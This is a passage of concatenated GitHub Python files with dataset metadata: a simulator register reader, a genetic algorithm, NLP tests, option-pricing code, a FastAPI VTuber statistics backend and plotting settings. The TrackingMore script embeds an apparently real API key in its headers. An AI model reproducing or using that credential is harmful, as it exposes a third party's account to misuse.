Registers\nfrom src.Memory import Memory\n\n\nclass ReadContents:\n def __init__(self):\n self.instructions = Instructions()\n #self.registers = Registers()\n #self.memory = Memory()\n\n def read_iregisters(self, data):\n registers_data = data[data.find('I-REGISTERS')+len('I-REGISTERS')+1:data.find('FP-REGISTERS')].splitlines()\n #print registers_data\n for index in registers_data:\n regs = index.split()\n #print regs\n Registers.r[regs[0]]['contents'] = regs[1]\n #print self.registers.r\n\n def read_fpregisters(self, data):\n registers_data = data[data.find('FP-REGISTERS')+len('FP-REGISTERS')+1:data.find('MEMORY')].splitlines()\n for index in registers_data:\n regs = index.split()\n #print regs\n Registers.f[regs[0]]['contents'] = regs[1]\n #print self.registers.f\n\n def read_memory(self, data):\n memory_data = data[data.find('MEMORY')+len('MEMORY')+1:data.find('CODE')].splitlines()\n #print \"em\", memory_data\n for index in memory_data:\n regs = index.split()\n #print regs\n Memory.location[regs[0]] = regs[1]\n #print self.memory.location\n\n def get_instructions(self, data):\n start = data.find('CODE')\n code = data[start+5:]\n self.instructions.instructions = code.splitlines()\n #self.instructions.memory = self.memory\n #self.instructions.registers = self.registers\n #print self.instructions\n\n def return_attrs(self):\n #print \"id : \", id(self.instructions)\n return self.instructions#, self.registers, self.memory\n\nif __name__ == '__main__':\n a = ReadContents()\n f = open('input.txt', 'r')\n contents = f.read()\n a.read_iregisters(contents)\n a.read_fpregisters(contents)\n a.read_memory(contents)","repo_name":"HarishRohini/eecs645","sub_path":"ReadContents.py","file_name":"ReadContents.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"532564792","text":"import random\nfrom genetic import *\n\nclass Chromosome:\n\n #constructor\n def __init__(self):\n self.chromosomeSize = 8\n self.geneSize = 4\n self.dnArray = []\n self.fitness = 0\n self.probability = 0\n #geneSize * chromosomeSize because there are geneSize # of bits\n #and chromosomeSize # of genes in a Chromosome\n for x in range(0, self.geneSize * self.chromosomeSize):\n self.dnArray.append(0)\n self.randomizeGenes()\n self.translate()\n\n #randomize all genes in the dnArray string\n def randomizeGenes(self):\n for x in range(0 , self.geneSize * self.chromosomeSize):\n gene = random.randrange(0, 2)\n self.dnArray[x] = gene\n\n\n '''\n function RECEIVES a chromosome\n and RETURNS a chromosome with updated arithmeticArray\n '''\n def translate(self):\n self.arithmeticArray = []\n bitString = \"\"\n for x in range(0, self.chromosomeSize):\n #x counts genes\n for y in range(0, self.geneSize):\n #y counts bits in a gene\n bitString += str(self.dnArray[x+y])\n\n #after finished with a single gene, translate with bitsToArithmetic\n #and transfer to the arithmeticArray\n self.arithmeticArray.append(bitsToArithmetic(bitString))\n #reset bitString so we don't get huge strings of bits :)\n bitString = \"\"\n\n\n def computeSum(self):\n realExpressionArray = toRealExpression(self.arithmeticArray)\n if(realExpressionArray[0] == 'n/a'):\n return -1\n sum = float(realExpressionArray[0])\n counter = 1\n while(counter < len(realExpressionArray)):\n if(realExpressionArray[counter] == '+'):\n sum += float(realExpressionArray[counter+1])\n if(realExpressionArray[counter] == '-'):\n sum -= float(realExpressionArray[counter+1])\n if(realExpressionArray[counter] == '*'):\n sum *= float(realExpressionArray[counter+1])\n if(realExpressionArray[counter] == '/'):\n sum /= float(realExpressionArray[counter+1])\n counter += 2\n\n return sum\n\n def updateFitness(self, targetNum):\n #if the denominator isn't 0...\n if( abs(targetNum - self.computeSum()) == 0 ):\n #throw a flag here! Found a solution\n self.fitness = 0\n else:\n self.fitness = 1 / abs(targetNum - self.computeSum())\n\n def recombinate(self, otherChromosome):\n bitPick = random.randrange(0, self.geneSize*self.chromosomeSize)\n for x in range(bitPick, self.geneSize*self.chromosomeSize):\n #swap everything past the bitPick point\n temp = self.dnArray[x]\n self.dnArray[x] = otherChromosome.dnArray[x]\n otherChromosome.dnArray[x] = temp\n self.translate()\n otherChromosome.translate()\n\n def mutate(self, mutationRate):\n for x in range(0, self.geneSize * self.chromosomeSize):\n gamble = random.random()\n if(gamble < mutationRate):\n self.dnArray[x] = not self.dnArray[x]\n\n #this probability ONLY is calculated in the context of a generation\n #the sumSoFar provides boundaries for the pick (essentially defining pie chart)\n #This will probably cause issues with [n/a] strings... how to fix?\n def updateProbability(self, totalFitness, sumSoFar):\n if(toRealExpression(self.arithmeticArray) == 'n/a'):\n self.probability = 0\n return\n self.probability = self.fitness/totalFitness\n","repo_name":"tiny-crab/pygenetic","sub_path":"chromosome.py","file_name":"chromosome.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34810279878","text":"import requests\n\nurl = \"https://api.trackingmore.com/v4/trackings/update/9a7ef5e14d6fcb28c7872fbf2d99caeb\"\n\npayload = {\n # \"tracking_destination_country\": \"eg\",\n # \"tracking_origin_country\": \"us\",\n \"title\": \"Welcome Testing Track\"\n}\nheaders = {\n \"Content-Type\": \"application/json\",\n \"Accept\": \"application/json\",\n \"Tracking-Api-Key\": \"2cknap14-rgef-aooz-twdh-uaqs44kjm5hd\"\n}\n\nresponse = requests.put(url, json=payload, headers=headers)\n\nprint(response.json())","repo_name":"3b3z-himself/TrackingMore","sub_path":"update_tracking.py","file_name":"update_tracking.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27732779547","text":"import unittest\n\nfrom nlp import nlp\n\n\nclass TestNbCharacters(unittest.TestCase):\n\n def test_simple(self):\n text = 'wilfried'\n self.assertEqual(nlp.nbCharacters(text), 8)\n\n def test_avec_ponctuation(self):\n text = \"Vas-tu à l'hopital?\"\n self.assertEqual(nlp.nbCharacters(text), 19)\n\nclass TestNbWords(unittest.TestCase):\n\n def test_simple(self):\n text = 'Tous les hommes sont mortels'\n # ['Tous', 'les', 'hommes', 'sont', 'mortels']\n self.assertEqual(nlp.nbWords(text), 5)\n\n def test_avec_ponctuation_simple(self):\n text = 'Tous les hommes sont mortels.'\n # ['Tous', 'les', 'hommes', 'sont', 'mortels']\n self.assertEqual(nlp.nbWords(text), 5)\n\n def test_avec_ponctuation(self):\n text = \"Vas-tu à l'hopital?\"\n # ['Vas', 'tu', 'à', 'l', 'hopital']\n self.assertEqual(nlp.nbWords(text), 5)\n\n\nclass TestOccurences(unittest.TestCase):\n\n def test_un(self):\n text = 'Tous les hommes sont mortels'\n expected_output = {\n 'tous': 1,\n 'les': 1,\n 'hommes': 1,\n 'sont': 1,\n 'mortels': 1,\n }\n self.assertEqual(nlp.occurrences(text), expected_output)\n\n def test_deux(self):\n text = 'ho ho, la la la la le le le'\n expected_output = {\n 'ho': 2,\n 'la': 4,\n 'le': 3,\n }\n self.assertEqual(nlp.occurrences(text), expected_output)\n\n\nclass TestExtractKeyWords(unittest.TestCase):\n\n def test_simple(self):\n text = \"\"\"\n La France est un pays attachant avec de magnifiques monuments et une savoureuse gastronomie. \n C'est pourquoi parler français lors de ses voyages ou pour nouer des relations professionnelles demeure un vrai plus !\n En France, il y a au total 11 fêtes pendant l’année. Ce sont des jours fériés, c’est-à-dire des jours pendant lesquels on\n ne travaille pas. Certaines fêtes sont civiles et d’autre sont d’origine religieuses. Voici les principales. Le jour de l’An\n correspond au 1 janvier. On le fête avec ses amis ou sa famille, et on souhaite « bonne année ! » à ses proches. Le 14 juillet\n est la fête nationale française. Elle célèbre la prise de la Bastille qui a eu lieu le 14 juillet 1789. Des feux d’artifices \n et des défilés militaires sont organisés. Le 8 mai est la fête de la Victoire. C’est la commémoration, c’est-à-dire la fête \n anniversaire, de la fin de la Seconde Guerre mondiale. Le 1er mai correspond à la fête du Travail, et rappelle la lutte des\n ouvriers pour réduire la journée de travail à huit heures. Ce jour-là, on offre traditionnellement du muguet, une petite \n fleur blanche, à ses proches. Noël a lieu le 25 décembre. C’est une fête chrétienne qui célèbre la naissance de Jésus.\n \"\"\"\"\"\n expected_output = [\n {'keyword': 'france', 'relevance': 0.06258802836742607},\n {'keyword': 'fête', 'relevance': 0.0709559128934118},\n {'keyword': 'gastronomie', 'relevance': 0.16601451526587843},\n {'keyword': 'pays', 'relevance': 0.1846637908731856}\n ]\n\n self.assertEqual(nlp.extractKeywords(text, nb_keywords=4), expected_output)\n","repo_name":"wilcoln/tai-interview-solution","sub_path":"server/nlp/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30616128678","text":"from typing import Tuple\nimport torch.nn as nn\nimport torch\n\n\n\nclass FFN(nn.Module):\n\n def __init__(self, input_dim: int, output_dim: int, hidden_dims: Tuple[int]):\n super().__init__()\n \n blocks = []\n input_dim_block = input_dim\n for hidden_dim in hidden_dims:\n blocks.append(nn.Linear(input_dim_block, hidden_dim))\n blocks.append(nn.PReLU())\n input_dim_block = hidden_dim\n blocks.append(nn.Linear(input_dim_block, output_dim))\n self.network = nn.Sequential(*blocks)\n self.output_dim = output_dim\n\n def forward(self, *args):\n x = torch.cat(args, -1)\n out = self.network(x)\n return out\n\n\n\n","repo_name":"SigCGANs/Sig-Wasserstein-GANs","sub_path":"lib/networks/ffn.py","file_name":"ffn.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} +{"seq_id":"14701690597","text":"import os\n\nfrom setuptools import setup\n\nversion = \"1.0.0dev\"\n\nDEVEL_REQUIREMENTS = [\n \"autoflake==1.3\",\n \"black==20.8b1\",\n \"isort==4.3.21\",\n \"jinja2\",\n \"pre-commit==2.9.3\",\n \"pylint==2.6.0\",\n \"pytest\",\n]\n\nEXTRAS_REQUIREMENTS = {\"devel\": DEVEL_REQUIREMENTS}\n\n\ndef get_long_description():\n description = \"\"\n try:\n with open(\n os.path.join(os.path.dirname(os.path.realpath(__file__)), \"README.md\"),\n encoding=\"utf-8\",\n ) as file:\n description = file.read()\n except FileNotFoundError:\n pass\n return description\n\n\ndef do_setup():\n setup(\n version=version,\n extras_require=EXTRAS_REQUIREMENTS,\n )\n\n\nif __name__ == \"__main__\":\n do_setup()\n","repo_name":"politools/dag-checks","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"53"} +{"seq_id":"8149563407","text":"import numpy as np\n\ndef Binomial_Tree_Bonus1(S_t, K, r, q, sigma, t, T_minus_t, M, n, S_ave_t):\n delta_t = T_minus_t / n\n T = T_minus_t + t\n u = np.exp(sigma * (delta_t ** 0.5))\n d = 1 / u\n p = (np.exp((r - q) * delta_t) - d) / (u - d)\n\n # Step 1 & Step 2\n A = np.zeros((n + 1, n + 1, M + 1))\n eur_C = np.zeros((n + 1, n + 1, M + 1)) # European call\n ame_C = np.zeros((n + 1, n + 1, M + 1)) # American call\n for i in range(n + 1):\n for j in range(i + 1):\n A_max = (S_ave_t * (t * n / T_minus_t + 1) + (S_t * u) * (1 - u ** (i - j)) / (1 - u) + (S_t * (u ** (i - j)) * d) * (1 - d ** j) / (1 - d)) / (i + t * n / T_minus_t + 1)\n A_min = (S_ave_t * (t * n / T_minus_t + 1) + (S_t * d) * (1 - d ** j) / (1 - d) + (S_t * u * d ** j) * (1 - u ** (i - j)) / (1 - u)) / (i + t * n / T_minus_t + 1)\n for k in range(M + 1):\n A[i][j][k] = np.exp(((M - k) / M) * np.log(A_max) + (k / M) * np.log(A_min))\n\n # Step 3\n for j in range(n + 1):\n for k in range(M + 1):\n eur_C[n][j][k] = max(A[n][j][k] - K, 0)\n ame_C[n][j][k] = max(A[n][j][k] - K, 0)\n \n # Step 4\n for i in range(n - 1, -1, -1):\n for j in range(i + 1):\n for k in range(M + 1):\n A_u = (A[i][j][k] * (i + t * n / T_minus_t + 1) + S_t * (u ** (i + 1 - j)) * (d ** j)) / (i + t * n / T_minus_t + 2)\n if A[i + 1][j][0] == A[i + 1][j][M]: # 最上面或最下面\n eur_C_u = eur_C[i + 1][j][0]\n ame_C_u = ame_C[i + 1][j][0]\n elif A[i + 1][j][M] > A_u: # 跟最後一個一樣\n eur_C_u = eur_C[i + 1][j][M]\n ame_C_u = ame_C[i + 1][j][M]\n else:\n k_u = list(A[i + 1][j]).index(A[i + 1][j][A[i + 1][j] <= A_u][0])\n w_u = (A[i + 1][j][k_u - 1] - A_u) / (A[i + 1][j][k_u - 1] - A[i + 1][j][k_u])\n eur_C_u = w_u * eur_C[i + 1][j][k_u] + (1 - w_u) * eur_C[i + 1][j][k_u - 1]\n ame_C_u = w_u * ame_C[i + 1][j][k_u] + (1 - w_u) * ame_C[i + 1][j][k_u - 1]\n \n A_d = (A[i][j][k] * (i + t * n / T_minus_t + 1) + S_t * (u ** (i - j)) * (d ** (j + 1))) / (i + t * n / T_minus_t + 2)\n if A[i + 1][j + 1][0] == A[i + 1][j + 1][M]:\n eur_C_d = eur_C[i + 1][j + 1][0]\n ame_C_d = ame_C[i + 1][j + 1][0]\n elif A[i + 1][j + 1][M] > A_d:\n eur_C_d = eur_C[i + 1][j + 1][M]\n ame_C_d = ame_C[i + 1][j + 1][M]\n else:\n k_d = list(A[i + 1][j + 1]).index(A[i + 1][j + 1][A[i + 1][j + 1] <= A_d][0])\n w_d = (A[i + 1][j + 1][k_d - 1] - A_d) / (A[i + 1][j + 1][k_d - 1] - A[i + 1][j + 1][k_d])\n eur_C_d = w_d * eur_C[i + 1][j + 1][k_d] + (1 - w_d) * eur_C[i + 1][j + 1][k_d - 1]\n ame_C_d = w_d * ame_C[i + 1][j + 1][k_d] + (1 - w_d) * ame_C[i + 1][j + 1][k_d - 1]\n eur_C[i][j][k] = (p * eur_C_u + (1 - p) * eur_C_d) * np.exp(-r * delta_t)\n ame_C[i][j][k] = max(A[i][j][k] - K, (p * ame_C_u + (1 - p) * ame_C_d) * np.exp(-r * delta_t))\n \n return eur_C[0][0][0], ame_C[0][0][0]\n\nif __name__ == '__main__':\n import time\n import pandas as pd\n from Bonus2 import Binomial_Tree_Interpolation\n\n S_t = 50\n K = 50\n r = 0.1\n q = 0.05\n sigma = 0.8\n t = 0.25\n T_minus_t = 0.25 # T = 0.5\n Ms = [50]\n n = 100\n S_ave_t = 50\n \n # Bonus 1\n print(\"Bonus 1\")\n result = []\n for M in Ms:\n t9 = time.time()\n linearly_eur = round(Binomial_Tree_Interpolation(S_t, K, r, q, sigma, t, T_minus_t, M, n, S_ave_t)[0], 4)\n linearly_ame = round(Binomial_Tree_Interpolation(S_t, K, r, q, sigma, t, T_minus_t, M, n, S_ave_t)[1], 4)\n t10 = time.time()\n print(\"Finish linearly M = {}, Spend Time: {}\".format(M, round(t10 - t9, 6)))\n logarithmically_eur = round(Binomial_Tree_Bonus1(S_t, K, r, q, sigma, t, T_minus_t, M, n, S_ave_t)[0], 4)\n logarithmically_ame = round(Binomial_Tree_Bonus1(S_t, K, r, q, sigma, t, T_minus_t, M, n, S_ave_t)[1], 4)\n t11 = time.time()\n print(\"Finish logarithmically M = {}, Spend Time: {}\".format(M, round(t11 - t10, 6)))\n result.append([linearly_eur, logarithmically_eur, linearly_ame, logarithmically_ame])\n\n # 印出結果\n comparion = pd.DataFrame(result).T\n comparion.index = [\"European(linearly)\", \"European(logarithmically)\", \"American(linearly)\", \"American(logarithmically)\"]\n comparion.columns = [\"M = {}\".format(M) for M in Ms]\n print(comparion)\n\n","repo_name":"mic-tu/109-2_FInancial_Computation","sub_path":"Homework5/Bonus1.py","file_name":"Bonus1.py","file_ext":"py","file_size_in_byte":4733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31123094148","text":"from typing import List\nfrom fastapi import FastAPI\nfrom pydantic import BaseModel\nimport json\nimport pandas as pd\n\n\napp = FastAPI()\n\n\njsondataChannel = open('../data/channels.json', encoding=\"utf8\")\nchannel = json.load(jsondataChannel)\njsondataSuperchat = open('../data/superchat_stats.json', encoding=\"utf8\")\nsuperchat = json.load(jsondataSuperchat)\njsondataChatStats = open('../data/chat_stats.json', encoding=\"utf8\")\nchat_stats = json.load(jsondataChatStats)\n\n\n# untuk mengfilter hanya hololive yang tampil\ndef hololiveFilter(talent):\n return talent['affiliation'] == \"Hololive\"\n\n\nhololiveTalent = list(filter(hololiveFilter, channel))\n\n# untuk mengurutkan jumlah subscriber terbanyak\nsortedsubs = sorted(hololiveTalent, key=lambda x: x['subscriptionCount'], reverse=True)\n\nsorted_video_count = sorted(hololiveTalent, key=lambda x: x['videoCount'], reverse=True)\n\n# sorted_livechart\n\n# hapus channel hololive\nfor i, item in enumerate(sortedsubs):\n if item[\"channelId\"] == \"UCJFZiqLMntJufDCHc6bQixg\":\n del sortedsubs[i]\n\n\n# =============================================\nchat_counts = {}\ndef add_chat(data):\n channelId = data[\"channelId\"]\n chats = data[\"chats\"]\n if channelId in chat_counts:\n chat_counts[channelId] += chats\n else:\n chat_counts[channelId] = chats\nfor data in chat_stats:\n add_chat(data)\n\njumlahchat = []\nfor item in chat_counts:\n temp = {}\n temp[\"channelId\"] = item\n temp[\"valuechat\"] = chat_counts[item]\n jumlahchat.append(temp)\n\nchannelvidcout = []\nfor item1 in hololiveTalent:\n for item2 in jumlahchat:\n if item1['channelId'] == item2['channelId']:\n item2.update(item1)\n channelvidcout.append(item2)\nsortedchat = sorted(channelvidcout, key=lambda x: x['valuechat'], reverse=True)\n\n################################################\nban_counts = {}\ndef add_ban(databan):\n channelId = databan[\"channelId\"]\n banned = databan[\"bannedChatters\"]\n if channelId in ban_counts:\n ban_counts[channelId] += banned\n else:\n ban_counts[channelId] = banned\nfor data in chat_stats:\n add_ban(data)\n\njumlahban = []\nfor item in ban_counts:\n temp = {}\n temp[\"channelId\"] = item\n temp[\"valueban\"] = ban_counts[item]\n jumlahban.append(temp)\n\nchannelvidcout1 = []\nfor item1 in hololiveTalent:\n for item2 in jumlahban:\n if item1['channelId'] == item2['channelId']:\n item2.update(item1)\n channelvidcout1.append(item2)\nsortedban = sorted(channelvidcout1, key=lambda x: x['valueban'], reverse=True)\n\n##########################################\njumlahAgensiVtuber = {}\n\nfor vtuber in channel:\n affiliation = vtuber[\"affiliation\"]\n if affiliation in jumlahAgensiVtuber:\n jumlahAgensiVtuber[affiliation] += 1\n else:\n jumlahAgensiVtuber[affiliation] = 1\n\nsorted_jumlahAgensiVtuber = sorted(\n jumlahAgensiVtuber.items(), key=lambda x: x[1], reverse=True)\n\ntotalagensi = sum(jumlahAgensiVtuber.values())\n\nother = totalagensi - (jumlahAgensiVtuber[\"Independents\"] + jumlahAgensiVtuber[\"Nijisanji\"] +\n jumlahAgensiVtuber[\"Hololive\"] + jumlahAgensiVtuber[\"Twitch Independents\"])\n\nresult = []\nfor item in sorted_jumlahAgensiVtuber:\n temp = {}\n temp[\"id\"] = item[0]\n temp[\"value\"] = item[1]\n result.append(temp)\n\nIndependents = round(\n (jumlahAgensiVtuber[\"Independents\"] / totalagensi) * 100, 1)\nhololive = round((jumlahAgensiVtuber[\"Hololive\"] / totalagensi) * 100, 1)\nnijisanji = round((jumlahAgensiVtuber[\"Nijisanji\"] / totalagensi) * 100, 1)\nTwitchIndependents = round(\n (jumlahAgensiVtuber[\"Twitch Independents\"] / totalagensi) * 100, 1)\nOther_persen = round((other / totalagensi) * 100, 1)\n\npersenbar = []\npersenbar.append({\"id\": \"Independen\", \"value\": Independents})\npersenbar.append({\"id\": \"Hololive\", \"value\": hololive})\npersenbar.append({\"id\": \"Nijisanji\", \"value\": nijisanji})\npersenbar.append({\"id\": \"Twitch Independents\", \"value\": TwitchIndependents})\npersenbar.append({\"id\": \"Other\", \"value\": Other_persen})\n\n#############################################################\n\njumlahmatauang = {}\n\nfor matauang in superchat:\n curency = matauang[\"mostFrequentCurrency\"]\n if curency in jumlahmatauang:\n jumlahmatauang[curency] += 1\n else:\n jumlahmatauang[curency] = 1\n\ncolors = [\n \"#ff0000\", \"#00d4ff\", \"#16ff00\", \"#ffd600\", \"#ff7c00\",\n \"#ff00db\", \"#267fb1\", \"#2b7a1d\", \"#ffffff\", \"#A52A2A\",\n \"#84cd22\", \"#786209\", \"#073739\", \"#8ce74e\", \"#FF8C00\",\n \"#383c04\", \"#BDB76B\", \"#8FBC8F\", \"#2F4F4F\", \"#008000\",\n \"#4B0082\", \"#7CFC00\", \"#20B2AA\", \"#00FF00\", \"#7B68EE\",\n \"#FF4500\", \"#DB7093\", \"#DDA0DD\"\n]\n\nsuperchatcurency = []\nc = 0\nfor currency in jumlahmatauang:\n tempuang = {}\n tempuang[\"id\"] = currency\n tempuang[\"value\"] = jumlahmatauang[currency]\n tempuang[\"color\"] = colors[c]\n superchatcurency.append(tempuang)\n c = c + 1\n\n\n@app.get(\"/api\")\nasync def read_root():\n return channel\n\n\n@app.get(\"/api/agensi\")\nasync def read_root():\n return persenbar\n#\n@app.get(\"/api/chatstat\")\nasync def read_root():\n return sortedban\n#\n\n\n@app.get(\"/api/hololive\")\nasync def read_root():\n return hololiveTalent\n\n\n@app.get(\"/api/hololive/most_subscribers\")\nasync def read_root():\n return sortedsubs\n\n\n@app.get(\"/api/hololive/most_active_channels\")\nasync def read_root():\n return sorted_video_count\n\n\n@app.get(\"/api/hololive/chat\")\nasync def read_root():\n return sortedchat\n\n@app.get(\"/api/hololive/banchat\")\nasync def read_root():\n return sortedban\n\n\n@app.get(\"/api/map\")\nasync def read_root():\n return superchatcurency\n\n\n# ======================================================================\n# Generation 1\ndef hololiveGen1(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"1st Generation\"\nGen1 = list(filter(hololiveGen1, channel))\n@app.get(\"/api/hololive/gen1\")\nasync def read_root():\n return Gen1,\n\n# Generation 1\ndef hololiveGen1(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"1st Generation\"\nGen1 = list(filter(hololiveGen1, channel))\n@app.get(\"/api/hololive/gen1\")\nasync def read_root():\n return Gen1,\n\n# Generation 2\ndef hololiveGen2(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"2nd Generation\"\nGen2 = list(filter(hololiveGen2, channel))\n@app.get(\"/api/hololive/gen2\")\nasync def read_root():\n return Gen2\n\n# Generation 3\ndef hololiveGen3(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"3rd Generation\"\nGen3 = list(filter(hololiveGen3, channel))\n@app.get(\"/api/hololive/gen3\")\nasync def read_root():\n return Gen3\n\n# Generation 4\ndef hololiveGen4(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"4th Generation\"\nGen4 = list(filter(hololiveGen4, channel))\n@app.get(\"/api/hololive/gen4\")\nasync def read_root():\n return Gen4\n\n# Generation 5\ndef hololiveGen5(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"5th Generation\"\nGen5 = list(filter(hololiveGen5, channel))\n@app.get(\"/api/hololive/gen5\")\nasync def read_root():\n return Gen5\n\n# Generation 6\ndef hololiveGen6(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"6th Generation (HoloX)\"\nGen6 = list(filter(hololiveGen6, channel))\n@app.get(\"/api/hololive/gen6\")\nasync def read_root():\n return Gen6\n\n# Indonesia Generation 1\ndef hololiveIndonesiaGen1(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Indonesia 1st Gen\"\nIndonesiaGen1 = list(filter(hololiveIndonesiaGen1, channel))\n@app.get(\"/api/hololive/indonesiagen1\")\nasync def read_root():\n return IndonesiaGen1\n\n# Indonesia Generation 2\ndef hololiveIndonesiaGen2(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Indonesia 2nd Gen\"\nIndonesiaGen2 = list(filter(hololiveIndonesiaGen2, channel))\n@app.get(\"/api/hololive/indonesiagen2\")\nasync def read_root():\n return IndonesiaGen2\n\n# Indonesia Generation 3\ndef hololiveIndonesiaGen3(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Indonesia 3th Gen\"\nIndonesiaGen3 = list(filter(hololiveIndonesiaGen3, channel))\n@app.get(\"/api/hololive/indonesiagen3\")\nasync def read_root():\n return IndonesiaGen3\n\n# English Generation 1\ndef hololiveEnglishGen1(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"English (Myth)\"\nENGen1 = list(filter(hololiveEnglishGen1, channel))\n@app.get(\"/api/hololive/english1\")\nasync def read_root():\n return ENGen1\n\n# English Generation 2\ndef hololiveEnglishGen2(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"English (Council)\"\nENGen2 = list(filter(hololiveEnglishGen2, channel))\n@app.get(\"/api/hololive/english2\")\nasync def read_root():\n return ENGen2\n\n# Generation 0\ndef Generation0(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Generation 0\"\nGen0 = list(filter(Generation0, channel))\n@app.get(\"/api/hololive/gen0\")\nasync def read_root():\n return Gen0\n\n# Gamer\ndef Hologamer(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"GAMERS\"\ngamer = list(filter(Hologamer, channel))\n@app.get(\"/api/hololive/gamers\")\nasync def read_root():\n return gamer\n\n# Holostar Gen 1\ndef HolostarGen1(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Holostars 1st Gen\"\nholostar1 = list(filter(HolostarGen1, channel))\n@app.get(\"/api/hololive/holostar1\")\nasync def read_root():\n return holostar1\n\n# Holostar Gen 2\ndef HolostarGen2(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Holostars 2nd Gen\"\nholostar2 = list(filter(HolostarGen2, channel))\n@app.get(\"/api/hololive/holostar2\")\nasync def read_root():\n return holostar2\n\n# Holostar Gen 3\ndef hololiveIndonesiaGen3(talent):\n return talent['affiliation'] == \"Hololive\" and talent['group'] == \"Holostars 3rd Gen\"\nholostar3 = list(filter(hololiveIndonesiaGen3, channel))\n@app.get(\"/api/hololive/holostar3\")\nasync def read_root():\n return holostar3\n\n\n","repo_name":"bilalAn-nur/data-analyst-unikom","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38795162555","text":"\n#------------------------------------------------------------------------------\n# Plotting.py\n#\n# Create publication-ready 3D and 2D plots using matplotlib\n# \n#\n# Created: 4/4/18 - Daniel Newman -- dmn3669@louisiana.edu\n#\n# Modified:\n# * 4/4/18 - DMN -- dmn3669@louisiana.edu\n# - Added documentation for this script\n#\n#------------------------------------------------------------------------------\n\n\nimport matplotlib as mpl\nfrom matplotlib import pyplot as plt\nfrom matplotlib import ticker as mtick\nfrom matplotlib import rc\nfrom matplotlib import cm\nfrom mpl_toolkits.mplot3d import Axes3D\nimport numpy as np\nimport os\nfrom scipy.interpolate import griddata\nfrom cycler import cycler\n\nfrom pandas.plotting import register_matplotlib_converters\nimport datetime\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\n AutoMinorLocator)\nfrom matplotlib.ticker import Formatter\nimport matplotlib.dates as mdates\n\nimport matplotlib.colors as colors\n\n### MATPLOTLIBRC FORMAT\n#mpl.rcParams['backend'] = 'MacOSX'\n\n# LINES\nmpl.rcParams['lines.linewidth'] = 2.0 # line width in points\nmpl.rcParams['lines.dash_capstyle'] = 'round' # butt|round|projecting\n\n# FONT\nmpl.rcParams['font.family'] = 'serif'\nmpl.rcParams['font.weight'] = 'normal'\n#font.size : 12.0\n\n# mpl.rcParams['font.serif'] = 'DejaVu Serif', 'CMU Serif', 'Bitstream Vera Serif', 'New Century Schoolbook', 'Century Schoolbook L', 'Utopia', 'ITC Bookman', 'Bookman', 'Nimbus Roman No9 L', 'Times New Roman', 'Times', 'Palatino', 'Charter', 'serif'\n\nmpl.rcParams['font.serif'] = 'DejaVu Serif'\n\n# TEXT\nmpl.rcParams['text.hinting_factor'] = 8 # Specifies the amount of softness for hinting in the\n # horizontal direction. A value of 1 will hint to full\n # pixels. A value of 2 will hint to half pixels etc.\nmpl.rcParams['text.usetex'] = True\nmpl.rcParams['text.latex.preview'] = True\nmpl.rcParams['text.latex.preamble']=[r\"\\usepackage{amsmath} \\boldmath\"]\n\n\n# AXES\nmpl.rcParams['axes.labelsize'] = 22 # fontsize of the x any y labels\nmpl.rcParams['axes.labelweight'] = 'medium' # weight of the x and y labels\nmpl.rcParams['axes.prop_cycle'] = cycler('color', ['#e41a1c', '#377eb8', '#4daf4a', '#984ea3', '#ff7f00', '#ffff33', '#a65628'])\n ## color cycle for plot lines as list of string\n ## colorspecs: single letter, long name, or web-style hex\n ## Note the use of string escapes here ('1f77b4', instead of 1f77b4)\n\n# TICKS\nmpl.rcParams['xtick.labelsize'] = 18 # fontsize of the tick labels\nmpl.rcParams['ytick.labelsize'] = 18 # fontsize of the tick labels\n\n\n# GRID\nmpl.rcParams['grid.color'] = '0.75' # grid color\nmpl.rcParams['grid.linestyle'] = ':' # dotted\n\n# LEGEND\nmpl.rcParams['legend.fancybox'] = True # if True, use a rounded box for the\n # legend, else a rectangle\nmpl.rcParams['legend.fontsize'] = 16\nmpl.rcParams['legend.borderaxespad'] = 0.1 # the border between the axes and legend edge in fraction of fontsize\n\n# FIGURE\nmpl.rcParams['figure.figsize'] = 6,4 # figure size in inches\nmpl.rcParams['figure.subplot.left'] = 0.2 # the left side of the subplots of the figure\nmpl.rcParams['figure.subplot.right'] = 0.9 # the right side of the subplots of the figure\nmpl.rcParams['figure.subplot.bottom'] = 0.2 # the bottom of the subplots of the figure\nmpl.rcParams['figure.subplot.top'] = 0.85 # the top of the subplots of the figure\nmpl.rcParams['figure.subplot.wspace'] = 0.2 # the 